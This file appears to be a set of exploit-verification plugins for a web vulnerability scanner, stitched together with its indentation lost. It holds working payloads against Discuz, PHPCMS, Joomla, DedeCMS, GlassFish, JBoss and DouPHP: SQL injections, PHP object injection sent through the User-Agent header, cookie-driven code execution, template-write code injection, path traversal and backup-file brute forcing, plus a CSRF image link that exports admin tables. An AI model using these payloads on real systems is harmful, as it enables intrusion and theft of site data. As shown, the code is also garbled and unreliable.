def _verify(self):
result = Result(self)
sig = '2c1743a391305fbf367df8e4f069f9f9'
payload = {
"formhash":
"04949b0",
"srchtxt":
"aa",
"srchtype":
"threadsort",
"st":
"on",
"sortid":
"3",
"selectsortid":
"3 where tid=(select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#"
.format(sig),
"searchsubmit":
"true"
}
url = self.urlJoin("/search.php")
response = self.http.post(url, data=payload)
if response.status_code == 200:
if sig in response.content and "SQL" in response.content:
result['fullpath'] = response.request.body
result['payload'] = response.request.body
return result
def _verify(self):
log = Log("exploit-discuz_brutefile")
result = Result(self)
dctype = self.args.get("type", "discuz").lower()
if dctype not in ['discuz', 'discuzx']:
dctype = "discuz"
date = self.args.get("date", "15-01-01")
days = self.args.get("days", "10")
days = int(days)
dirs = self.args.get("dirs", "1")
dirs = int(dirs)
url = self.baseURL if ".php" in self.url else self.url
url = url.rstrip("/")
alives = []
for path in self.genPath(dctype, date, days, dirs):
try:
log.debug("request url {0}".format(url + path))
response = self.http.get(url + path)
except self.http.ConnectionError:
pass
if response.status_code == 200:
log.debug("got alives {0}".format(url + path))
alives.append(url + path)
if alives:
result['vulinfo'] = str(alives)
return result
def _info(self):
result = Result(self)
result['isvul'] = result.INFO
result['elseinfo'] = u"访问以下链接,查看是否可以下载附件:{0}".format(
self.genBypassLink())
return result
def _verify(self):
result = Result(self)
phpPayload = "phpinfo();"
sig = '_SERVER["HTTP_HOST"]'
url = self.urlJoin("/inc/splitword.php")
response = self.http.post(url, data={'Y2hlbmdzaGlzLmMjd': phpPayload})
if response.status_code == 200:
if sig in response.content:
result['fullpath'] = self.url
result['payload'] = phpPayload
return result
def _verify(self):
result = Result(self)
php_code = '''echo "asdfgh123456";'''
attack_payload = self._genPayload(php_code)
response = self.http.get(self.url,
headers={"User-Agent": attack_payload})
if response.status_code == 200:
response = self.http.get(self.url)
if response.status_code == 200 and 'asdfgh123456' in response.content:
result['fullpath'] = self.url
result['payload'] = attack_payload
return result
def _verify(self):
result = Result(self)
sig = '2c1743a391305fbf367df8e4f069f9f9'
params = "?inc=edit_sort&act=modify&name[]=yyy"
payload = {"table_album": "{0}".format(sig)}
url = self.urlJoin("/blog/ajax.php")
response = self.http.post(url + params, params=payload)
if response.status_code == 200:
if sig in response.content and "doesn't exist" in response.content:
result['fullpath'] = url
result['payload'] = response.request.url
return result
def _verify(self):
result = Result(self)
sig = '_SERVER["HTTP_HOST"]'
cookie = "GLOBALS[_DCACHE][smilies][searcharray]=/.*/ei; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();"
#cookie = "GLOBALS[_DCACHE][smilies][searcharray]=/.*/eiU; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();"
headers = dict()
headers['Cookie'] = cookie
response = self.http.get(self.url, headers=headers)
if response.status_code == 200:
if sig in response.content:
result['fullpath'] = self.url
result['payload'] = 'Cookie: '+cookie
return result
def _verify(self):
result = Result(self)
sig = u"才能浏览"
userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
#userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://**.**.**.**/search/spider.html)"
headers = {'User-Agent':userAgent}
response = self.http.get(self.url)
response2 = self.http.get(self.url, headers=headers)
if response2.status_code==200:
if sig.encode("utf-8") in response.content and sig.encode("gbk")in response.content and sig.encode("utf-8") not in response2.content and sig.encode("gbk") not in response2.content:
result['fullpath'] = self.url
result['payload'] = userAgent
return result
def _info(self):
result = Result(self)
url = self.urlJoin("admin.php")
filename = "alpha"
params = "?action=db&operation=export&setup=1&scrolltop=&anchor=&type=custom&customtables%5B%5D=pre_ucenter_admins&method=multivol&sizelimit=2048&extendins=0&sqlcompat=&usehex=1&usezip=0&filename={0}&exportsubmit=yes".format(
filename)
payload = "<img src='{0}'>".format(url + params)
result['isvul'] = Result.INFO
result['fullpath'] = url
result[
'elseinfo'] = u"发帖,嵌入图片{0},\n如果目标服务器为windows:\ndiscuzX访问/data/backup~1/{1}-1.sql,\ndiscuz访问/forumdata/backup~1/{1}-1.sql,\n目标服务器为linux则需要爆破backup_xxxxxx目录".format(
payload, filename)
return result
def _verify(self):
result = Result(self)
sig = '2c1743a391305fbf367df8e4f069f9f9'
payload = "1' and 1=2 union all select 1,'{0}".format(sig)
self.params['mod'] = "attachment"
self.params['findpost'] = "ss"
self.params['aid'] = base64.b64encode(payload)
url = self.urlJoin("/forum.php")
response = self.http.get(url, params=self.params)
if response.status_code == 200:
if sig in response.request.url:
result['fullpath'] = url
result['payload'] = payload
return result
def _verify(self):
result = Result(self)
#php_code = '''echo "asdfgh123456";'''
#attack_payload = self._genPayload(php_code)
attack_payload = '''}__t|O:21:"JDatabaseDriverMysqli":2:{s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;s:7:"print_r";}s:13:"\x5C0\x5C0\x5C0connection";i:1;}\xF0\x9D\x8C\x86'''
attack_payload = '''}__t|O:21:"JDatabaseDriverMysqli":2:{s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;s:7:"print_r";}s:13:"\\0\\0\\0connection";i:1;}\xF0\x9D\x8C\x86'''
response = self.http.get(self.url,
headers={"User-Agent": attack_payload})
#time.sleep(10)
if response.status_code == 200:
response = self.http.get(self.url)
print response.content
if response.status_code == 200 and '*****@*****.**' in response.content:
result['fullpath'] = self.url
result['payload'] = attack_payload
return result
def _verify(self):
result = Result(self)
sig = '2c1743a391305fbf367df8e4f069f9f9'
payload = "1 and select 1 from (select concat_ws(':', left(rand(), 3), {0}), count(*) from information_schema.tables group by 1)a;".format(
sig)
self.params['ac'] = 'view'
self.params['shopid'] = payload
url = self.urlJoin("/shop.php")
response = self.http.get(url, params=self.params)
if response.status_code == 200:
if sig in response.content:
result['fullpath'] = url
result['payload'] = response.request.url
return result
def _verify(self):
result = Result(self)
phpPayload = "@phpinfo()"
params = "?label[a'.\"${%s}\".'][asd]=aaaa'" %phpPayload
sig = '_SERVER["HTTP_HOST"]'
url = self.urlJoin("/index.php")
response = self.http.get(url+params)
url2 = url.replace("index.php","cache/label_cache/index_~1.php")
response2 = self.http.get(url2)
if response2.status_code == 200:
if sig in response2.content:
result['fullpath'] = self.url
result['payload'] = str(phpPayload)
return result
def _verify(self):
result = Result(self)
sig = '_SERVER["HTTP_HOST"]'
payload = "<?php phpinfo();?>"
params = "?inc=ol_module&step=2&step=2&moduleid=../../../../hack/template/admin&action=maketpl&Apower[template_list]=1&postdb[filepath]=template/blue.htm&postdb[code]={0}".format(
payload)
url = self.urlJoin("/blog/ajax.php")
response = self.http.get(url + params)
params2 = "?inc=edit_sort&job=../../../../template/blue"
response2 = self.http.get(url + params2)
if response2.status_code == 200:
if sig in response2.content:
result['fullpath'] = url
result['payload'] = payload
return result
def _verify(self):
result = Result(self)
sig = '9876541'
params = "?inc=ol_module&step=2&moduleid=../../../../do/js&&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1"
payload = {
"pre":
"qb_label where lid=-1 UNION SELECT 1,2,3,4,5,6,0,{0},9,10,11,12,13,14,15,16,17,18,19#"
.format(sig)
}
url = self.urlJoin("/blog/ajax.php")
response = self.http.get(url + params, params=payload)
if response.status_code == 200:
if sig in response.content:
result['fullpath'] = url
result['payload'] = response.request.url
return result
def _verify(self):
result = Result(self)
sig = '9876541'
params = "?step=1"
payload = {
"type":
"area where 1=(updatexml(1,concat(0x5e24,(select {0}),0x5e24),1))#"
.format(sig)
}
url = self.urlJoin("/blog/member/update_sort.php")
response = self.http.get(url + params, params=payload)
if response.status_code == 200:
if sig in response.content:
result['fullpath'] = url
result['payload'] = response.request.url
return result
def _verify(self):
result = Result(self)
sig = u"远程获取失败"
self.params['step'] = "11"
self.params['insLockfile'] = "a"
self.params['s_lang'] = "a"
self.params['install_demo_name'] = "../data/admin/config_update.php"
url = self.urlJoin("/install/index.php")
response = self.http.get(url, params=self.params)
if response.status_code == 200:
if sig.encode('gbk') in response.content or sig.encode(
'utf-8') in response.content:
result['fullpath'] = url
result['payload'] = str(self.params)
return result
def _verify(self):
result = Result(self)
paths = ["/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/__admingui/WEB-INF/web.xml",
"/theme/META-INF/%c0.%c0./%c0.%c0./__admingui/WEB-INF/web.xml",
"/theme/META-INF/%E0%80%AE%E0%80%AE/%E0%80%AE%E0%80%AE/__admingui/WEB-INF/web.xml"]
signature = "<servlet-mapping>"
matchs = []
for path in paths:
url = self.protocol + "://" + self.host + path
response = self.http.get(url, allow_redirects=False)
if response.status_code == 200:
if signature in response.content:
matchs.append(url)
if matchs:
result['vulinfo'] = str(matchs)
return result
def _verify(self):
result = Result(self)
sig = '2c1743a391305fbf367df8e4f069f9f9'
payload = {
"gids[66]":
"'",
"gids[88][0]":
") and (select 1 from (select count(*),concat({0},floor(rand(0)*2))x from information_schema.tables group by x)a)#"
.format(sig)
}
url = self.url if "faq.php" in self.url else self.baseURL + "/faq.php?action=grouppermission"
response = self.http.post(url, data=payload)
if response.status_code == 200:
if sig in response.content and "SQL" in response.content:
result['fullpath'] = url
result['payload'] = "Post:" + response.request.body
return result
def _verify(self):
result = Result(self)
vulpaths = {
"jmx-console":
"/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
"web-console": "/web-console/ServerInfo.jsp",
"JMXInvokerServlet": "/invoker/JMXInvokerServlet",
"admin-console": "/admin-console/"
}
matchs = Dict()
for path in vulpaths:
url = self.urlJoin(vulpaths[path])
response = self.http.get(url, allow_redirects=False)
if response.status_code == 200 or response.status_code == 500:
matchs[path] = url
if matchs:
result['vulinfo'] = str(matchs)
return result
def _verify(self):
log = Log("exploit_douphp_backupbrute")
result = Result(self)
sqlList = [
'D20160~1.sql', 'D20150~1.sql', 'D20151~1.sql', 'D20140~1.sql',
'D20141~1.sql', 'D20131~1.sql'
]
vulURLs = []
for sqlfile in sqlList:
url = self.baseURL.rstrip("/") + "/data/backup/" + sqlfile
log.debug("getting '{0}'".format(url))
response = self.http.get(url, allow_redirects=False)
if response.status_code == 200:
log.debug("got alive'{0}'".format(url))
vulURLs.append(url)
if vulURLs:
result['vulinfo'] = str(vulURLs)
return result